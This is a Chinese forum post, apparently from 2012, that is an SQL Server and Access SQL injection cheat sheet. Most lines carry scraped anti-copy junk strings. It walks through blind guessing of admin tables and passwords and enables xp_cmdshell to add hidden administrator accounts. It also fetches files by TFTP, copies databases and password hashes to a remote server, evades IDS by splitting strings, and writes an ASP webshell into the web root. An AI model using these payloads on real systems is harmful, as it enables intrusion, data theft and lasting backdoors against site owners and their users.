1..判断有无注入点
( y9 ]2 g+ k9 X; and 1=1 and 1=2
5 G: @' Z% `+ ~8 u6 e" g$ j
6 i, n. b" ~" W! p% O$ V- D3 }/ Y8 n/ d7 P8 `4 R: O6 A
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
! t7 i4 f: B4 {5 H8 G* S% rand 0<>(select count(*) from *)
/ X( s) T) f, z2 ]6 Tand 0<>(select count(*) from admin) ---判断是否存在admin这张表
) P* C9 m3 b* O9 D/ I. ~3 A) l9 \1 _0 l( p" ~/ m' i8 w) L6 X0 O
6 P; U! P& j/ }4 i/ |3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 " ~* q3 Q) Q) u3 c: k
and 0<(select count(*) from admin)
' R: j- |2 n k" v3 k* xand 1<(select count(*) from admin) : j+ i2 q1 h9 ?/ ], O- V
猜列名还有 and (select count(列名) from 表名)>0
8 Q$ v, ?: ^+ ^# {
7 z- j. t" M9 d" F
+ g# V" _0 C, V! H& L) [4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
) q6 d' X. q3 n/ ^3 R* `! L9 _and 1=(select count(*) from admin where len(*)>0)--
3 `' l5 y; w" f! Sand 1=(select count(*) from admin where len(用户字段名称name)>0)
~6 s( c; q8 |2 x h2 I: Uand 1=(select count(*) from admin where len(密码字段名称password)>0)
. Y) }' n' n! w6 q" M
" B: D; _3 w* Q6 W5 D3 x) f5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
% i; q# @9 W7 r9 g6 M( d8 a6 Band 1=(select count(*) from admin where len(*)>0)
! _' W3 e. X0 g* m$ uand 1=(select count(*) from admin where len(name)>6) 错误 $ x0 j# T/ c9 c! }) ?1 d p
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
0 l: m) O$ [2 N0 Z4 Tand 1=(select count(*) from admin where len(name)=6) 正确
) @+ \( f, O& ]/ q% S. Z' x* `
and 1=(select count(*) from admin where len(password)>11) 正确 # g l" p4 `" N! ?" q+ k
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 & J, t3 l9 @* K8 e$ _( g3 L( ]: r' a
and 1=(select count(*) from admin where len(password)=12) 正确
- f" A- s+ W: T0 l; v$ ]: R' m; _猜长度还有 and (select top 1 len(username) from admin)>5; a8 c x, N0 u' g+ s/ |
/ I9 \0 [( j1 l( ]% k% [) P$ d$ D# {5 \/ e% s' c1 R: v& Q
6.猜解字符
6 M) W+ q/ T& B- V' Uand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 ; s7 | h# @+ F) x7 f- M: v
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 8 n6 [" h/ B8 ^5 y. D5 J
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
, ?/ x( g. N. _1 O
4 {9 T, O9 o/ g- O猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算
2 D) S; Y- { H$ E1 v2 Q9 _and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 4 F; y) Q |3 I. m% j# M T" s
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. ; w& e0 y0 Y5 s2 a/ ]/ Z
+ L5 s) {3 o5 Ugroup by users.id having 1=1--
0 g J0 x( T7 _& z Rgroup by users.id, users.username, users.password, users.privs having 1=1-- # K+ q8 Y4 l. N: d& b/ n* \% y
; insert into users values( 666, attacker, foobar, 0xffff )--
/ \9 M& ^& f& e& ?0 g7 e
4 | M5 o& d5 b# J7 G! J* c6 UUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
o) X7 b3 d! s/ z3 mUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- * q* h; N2 E! Z0 @- _2 r( c" a4 k
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
; W1 b+ B4 k9 d7 R; a1 A% _UNION SELECT TOP 1 login_name FROM logintable-
8 j. t( ]+ S0 UUNION SELECT TOP 1 password FROM logintable where login_name=Rahul-- ; ?0 k% D: g+ t0 R1 o* C
* X3 o7 M4 k8 A% t看服务器打的补丁=出错了打了SP4补丁 4 V- n. Z$ Z5 t" B R+ S5 z
and 1=(select @@VERSION)--
4 @+ V5 x+ v: S7 d
1 a/ Q: y# M) A7 i5 G: K- `看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 - L. f4 S' ^" n3 ]% V# X$ _
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- ) {- g' ?: [: a1 P- g7 L( n
: K1 f$ {5 _6 r2 t' u! o/ M' E$ C判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
4 q9 {/ Y ~. v0 z/ Vand sa=(SELECT System_user)-- : t; m, D6 n9 B; |
and user_name()=dbo--
2 F- a6 H6 @ R$ X9 y, nand 0<>(select user_name()--
( f/ Q6 N* n, G( G1 C! D- Z
l' ?" j0 {0 \9 [3 X: _; ?看xp_cmdshell是否删除 ! |; n! v9 m H- _& ]' d8 f+ {) A
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
4 P$ |3 _% }; r+ W+ K _ S6 N: s0 x) G+ [% n- I
xp_cmdshell被删除,恢复,支持绝对路径的恢复 6 I# P( N; g8 w# v) q1 v* K+ u
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- * z% Q7 b" _( T" \6 X; U
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- " ?$ z/ P% {9 ~& {3 j. y
+ A7 h4 _# `! a% ]3 f
反向PING自己实验
* Z6 ^$ U( l1 _& W;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
, U& s% o @* W/ U! M8 S. ]1 l; B; z/ }4 [9 e
加帐号
; O: j% h! A l& x( V2 i+ V; i ];DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
- c7 [8 I6 V; \+ x* c+ H
2 _9 c8 W; X/ e6 N创建一个虚拟目录E盘:
7 A3 U# G9 j! x% V% A1 Y- V5 j;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- $ z* D* r6 @2 M' M% i4 A. t; R
1 T0 C% P7 d: h& d9 e2 g
访问属性:(配合写入一个webshell) + U! Z6 _0 T' `2 \0 B7 Y
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
. S/ v! _/ E5 c/ w
5 A! m% ~& ^. X6 _* A- X5 z/ V2 E9 Y5 _% z" \% Y
MSSQL也可以用联合查询
3 d- C/ u: x+ {' k N9 D' N+ l1 n. E7 @?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin ' L. A. k4 @1 g+ q( o0 Q7 K; }' w
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
6 Q+ B9 `- f# H& p# |, [
- ?! c C! @5 A
% t6 ?" C1 \( I! h爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 - Z9 U! y2 Y+ r6 ^
' t8 J- v6 W. K: i
% d* H6 K( n6 |/ d+ o: [ h8 K0 k8 Y8 v& A9 _% o
得到WEB路径 5 Z3 @' w$ I, _, u w0 S
;create table [dbo].[swap] ([swappass][char](255));-- ! R- D+ H1 ]6 h0 j& j& a
and (select top 1 swappass from swap)=1--
9 A' d8 g5 g' e6 w! r;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
" f* D6 X9 w! ]) K;use ku1;-- ) \& I8 p0 e4 Z! ~4 P, C
;create table cmd (str image);-- 建立image类型的表cmd # G$ f9 _& `* g1 m6 E) R+ i3 o
# x( k- C$ f8 Z* k* h存在xp_cmdshell的测试过程:
0 \% ]: S( c8 H- Y% o;exec master..xp_cmdshell dir
' R) M& u' ^7 J' H/ \;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 1 q* @: C& {, J3 y
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
& \4 X' k; y/ k3 r' S! s;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- / J U( B0 T |2 T" d1 {' O1 N
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
& r& ~6 q1 r% K2 l U;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- 6 w2 c- s3 V! h& o
exec master..xp_servicecontrol start, schedule 启动服务
: @4 n) h( X1 R7 m6 Mexec master..xp_servicecontrol start, server % W+ w# s9 v2 m# v2 m, b- W
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
. B) h5 ?/ y( N% S% H5 ~! p' r2 k: p;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
! P& @! C9 P) y! v2 K( _/ [; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 2 E1 h7 s2 D6 J S, u
; x, s' f V- q2 j;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
2 f2 }9 t8 W _3 ?* h;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
: Y3 {: C+ U; e: I5 Y;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
" F7 I$ D6 E( C6 b如果被限制则可以。
7 E& H, V; h( ?2 M1 v! k5 Zselect * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
# ]9 ^! w) ^5 H3 `$ R; v$ K( W4 o0 k/ C: Y0 E# _
查询构造:
0 S' C4 g2 I4 L3 \! mSELECT * FROM news WHERE id=... AND topic=... AND ..... , L2 J% ~/ f! ^! x
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
- F+ a$ p; I) G8 M) M' mselect 123;-- 4 f3 j5 J3 G; x+ ? t6 Y3 ]8 q
;use master;--
5 p- Y7 |9 g8 P8 ^:a or name like fff%;-- 显示有一个叫ffff的用户哈。
0 F0 o) z& f; a# m9 l4 fand 1<>(select count(email) from [user]);-- 3 L$ a/ ^1 @2 t
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
$ E% X0 {9 @0 {;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
8 g* l& A0 y7 `& ^5 z! o$ I;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- 5 S% Z; h: i. \, W, N
;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- 2 ~: \+ D2 A, U4 h* Y, J
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- " `: K5 o: \2 C) k$ A( d2 I7 _' o6 b
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
- P4 J7 W) x. g7 `, X上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
% I2 f$ O: z) L( k2 l通过查看ffff的用户资料可得第一个用表叫ad
# D) ~1 K: H$ L/ b* u- }- ^, A然后根据表名ad得到这个表的ID 得到第二个表的名字 9 H/ g0 l7 I) G: G
+ e+ E" x( M9 `3 a* n6 y
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
5 `( a" w5 t8 D: oinsert into users values( 667,123,123,0xffff)-- ' p& o; H/ x! s8 c4 f1 W! m7 a% h
insert into users values ( 123, admin--, password, 0xffff)-- + k. [: J! }& `3 d0 D/ w
;and user>0 0 }* N% L X$ b3 P4 t8 S
;and (select count(*) from sysobjects)>0 5 j3 D0 {6 G; ~, K
;and (select count(*) from mysysobjects)>0 //为access数据库 " m* ~2 @5 q2 X3 x3 U8 [
x0 O& Z' a3 u枚举出数据表名
- \0 s+ I& J5 o! e;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
/ `& u, q4 X( R, w这是将第一个表名更新到aaa的字段处。
4 h3 ] B2 G H读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 , E" @$ ]; z1 [3 c, j/ {* _+ J
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
% x; P: i2 r7 t: }$ N然后id=1552 and exists(select * from aaa where aaa>5) 4 [& ]3 z8 e9 \) N5 S$ z- z
读出第二个表,一个个的读出,直到没有为止。
: A. A0 r* s+ ]& G C. r, _读字段是这样:
5 O2 \0 X' Y5 d5 U! F;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- % r0 u) z, Q# r+ r8 l# D
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 : r f& b/ a" B2 q' F
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- 7 w5 ?9 a4 {5 L- R t" W
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
# o6 {. [* q: D2 y- w) b* Z; w2 P( g/ H
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] 0 H6 m8 d2 h( K
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
$ h0 e, Y! P. H( \' U8 V8 S通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] 8 E K, P+ v/ ~' _& s
2 N# d! j! j* ~ H6 W[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
0 @ q& K& ] [4 T; Aupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
& J8 _( N8 f+ a# g' L2 c
6 F4 j. c5 Z/ k2 q A- G: U绕过IDS的检测[使用变量]
7 @" ^7 |3 |# p;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
% n6 d+ s& j$ I2 Z+ ~5 H;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
y$ Z3 t, r1 @% X0 \, r! C' I+ {) D7 {: p! c* a9 d
1、 开启远程数据库 5 R( g. v. g @( i4 d8 r' ], C$ x( f' V
基本语法 6 n& x6 A5 \% W3 f
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
# T. ^; s6 P; d3 z: h& `( r参数: (1) OLEDB Provider name
9 V) p% n' P' _6 K) m2、 其中连接字符串参数可以是任何端口用来连接,比如 ( ]) i; M/ p; k
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table & A! _" J8 C* K7 p4 _
3.复制目标主机的整个数据库insert所有远程表到本地表。
/ C" O; y' A. O; n2 _2 t+ @2 C6 w' Q1 h6 n* x' p& m
基本语法:
* S1 ]! n) y: z1 Q7 |) q Zinsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 / n3 L$ J4 f7 B- J6 M
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: $ t$ U- C8 H/ C A3 t; y
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 8 i {, E/ l% \; S' N/ {
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) / L) ^% T6 k+ v3 g, [
select * from master.dbo.sysdatabases
: t, N+ V3 A0 b% L& r: R( O: ginsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
" M: ?+ }9 p+ ?! Gselect * from user_database.dbo.sysobjects ) d8 E# t+ A4 N- O
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
]" i5 _ l) w0 Q- i2 \% t) H% nselect * from user_database.dbo.syscolumns ; o& s* v! ~! {
复制数据库: 3 C+ A, U0 b% l' S# r: t& ^" z
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 & K$ i/ c1 i) w4 u0 R# N# G8 q: V
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
, ]& h4 c" a8 f: I' k, X3 ^0 @5 Q2 X; F: \1 l
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
; W H1 @* Z6 N: m' K! I% xinsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
' e# v; ?% a; W% a, J# _得到hash之后,就可以进行暴力破解。 * d% w) k8 h% l4 B6 b* V o
" \: {# ?& n3 t4 d( I2 A0 Y- a: Q7 o遍历目录的方法: 先创建一个临时表:temp / U' Z# d5 ~/ e) S
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
. |2 n* S$ i7 ?) J- _0 _;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 0 } y1 [- q. T* W, M, r
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 ' ~2 a/ G0 U- q
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
' \' i8 y N6 [! _4 f/ ^;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
, D- _8 j( O% C7 {' a( ]# B* F;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
& `4 t# e: B1 n" I F6 u' ~;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- : P( F) i R, q3 u$ I1 z; K& K
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc i7 n3 l' Y8 _) d
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
3 E! k" y. w, \+ M8 Z写入表: 7 @$ ]/ Z/ C* P/ P7 q/ C7 M# K
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
9 g7 Y0 H3 [; k( X- ?/ U语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- ; Z1 t6 `6 B- Z# J7 \
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
3 g+ V" P0 K" l语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- & V ^2 g+ m% p0 b6 S) o( z# T- I
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
/ ]4 _3 x2 v7 X) s o N; L3 p U语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- $ @0 ^* w/ R, ?
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- ' F8 e1 I7 d; r
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
; Y' A1 a, y# b/ u* U' k语句9:and 1=(SELECT IS_MEMBER(db_owner));--
8 S, P* G7 H' B+ U7 o$ O' F4 W- {1 Z# j$ {+ b
把路径写到表中去: % i/ S8 |9 i* l' b! R! W( d& F
;create table dirs(paths varchar(100), id int)--
' j+ c2 N# e, J% r: E, {;insert dirs exec master.dbo.xp_dirtree c:\--
; B3 x- x) D8 \! j) u8 Nand 0<>(select top 1 paths from dirs)--
8 _8 d( l" p: B8 L5 s0 Z4 |and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
% }" j2 G5 x1 W6 y+ |;create table dirs1(paths varchar(100), id int)-- % B5 i$ P$ g2 m6 u$ @! m! w
;insert dirs exec master.dbo.xp_dirtree e:\web--
; D. |* d) y# B9 O8 Rand 0<>(select top 1 paths from dirs1)--
0 s' G6 | p1 Q$ ]0 y+ A% M6 p/ D' t% _* f3 {
把数据库备份到网页目录:下载 2 }6 ]3 t, ]/ k+ d: f) A1 X9 t
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
6 K. O2 W9 x7 E i! V6 Q/ l" w$ S1 d6 W' E0 N7 W# N/ J
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) : ^0 @6 q/ W3 \+ Q2 g; O
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 . C+ b4 _8 u" C; Z
and 1=(select user_id from USER_LOGIN)
% J, l6 ^+ L" i) cand 0=(select user from USER_LOGIN where user>1) & C' b, T7 W9 u
' |" C6 n# ^3 a4 F4 t
-=- wscript.shell example -=- 3 L* S( G- ?" c
declare @o int
6 U& P1 d7 f- }# t* X. Y) Vexec sp_oacreate wscript.shell, @o out
; `# ?* V! n/ | X, \0 S n. y+ oexec sp_oamethod @o, run, NULL, notepad.exe 1 N8 v( ^' y! a7 d3 u: k S
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
% T3 P- R: E% k/ _; \! v3 p/ w, [. U: i- ~* `" O+ R$ ~
declare @o int, @f int, @t int, @ret int
( i+ F8 G; m( @8 G, i1 bdeclare @line varchar(8000)
0 i- }6 d6 o3 d6 c6 C u* Zexec sp_oacreate scripting.filesystemobject, @o out ! F+ T- ?9 U5 p5 {/ q) |
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
* c$ I* |" X) S( ^/ ?exec @ret = sp_oamethod @f, readline, @line out
: Z! R4 `4 c i" a4 m$ d# F6 u" Jwhile( @ret = 0 ) ' X7 j) E( K% v& W3 ]# z0 J {
begin ' J; h& t" `8 h
print @line 5 U- Z9 {( V$ T# t O
exec @ret = sp_oamethod @f, readline, @line out
' u! H- R; `- U, J6 [5 z& oend
( e3 x& z# K- p& r4 a% [, v# j; m9 q, F1 L2 u% n
declare @o int, @f int, @t int, @ret int : \1 c; k7 x8 ]' B9 u0 M( N; _
exec sp_oacreate scripting.filesystemobject, @o out
. @0 u- x+ L- m$ vexec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 0 B4 M0 Z% F3 @5 m
exec @ret = sp_oamethod @f, writeline, NULL, ! ^$ m3 K. d; C& U' l# z. k
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
! `; n! d! p/ c, H- a8 V# L& i& t
5 e6 m ?0 c) q6 P; B7 Sdeclare @o int, @ret int ) h) n+ l8 {) Z4 m0 T5 m2 }3 `
exec sp_oacreate speech.voicetext, @o out ( P- w+ V3 e5 T+ n9 n+ c: G1 s
exec sp_oamethod @o, register, NULL, foo, bar : f2 g# r8 S2 x0 Z/ X5 R
exec sp_oasetproperty @o, speed, 150
q2 S; ~- w& z$ `exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
; ~. u4 r/ j- A/ M% D4 g2 Q# qwaitfor delay 00:00:05
9 g/ N9 @: H: q( j" ], _! ^% Z3 ?" f0 p! g5 q* B7 F# f! |
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
8 Y; d* s: b* N5 B: M9 y- J+ I6 Y. N$ B; u( b7 z, n/ t" K$ R
xp_dirtree适用权限PUBLIC % [6 r' f3 Y6 G1 a9 w
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
3 ]+ o$ C& v8 p; ccreate table dirs(paths varchar(100), id int)
3 t) ^, F1 a+ O建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 * n& V: x6 `0 |+ R2 v; @# z
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
1 m/ M/ {+ W3 P0 u v |
发表于 2012-9-15 14:32:40
收藏
支持
反对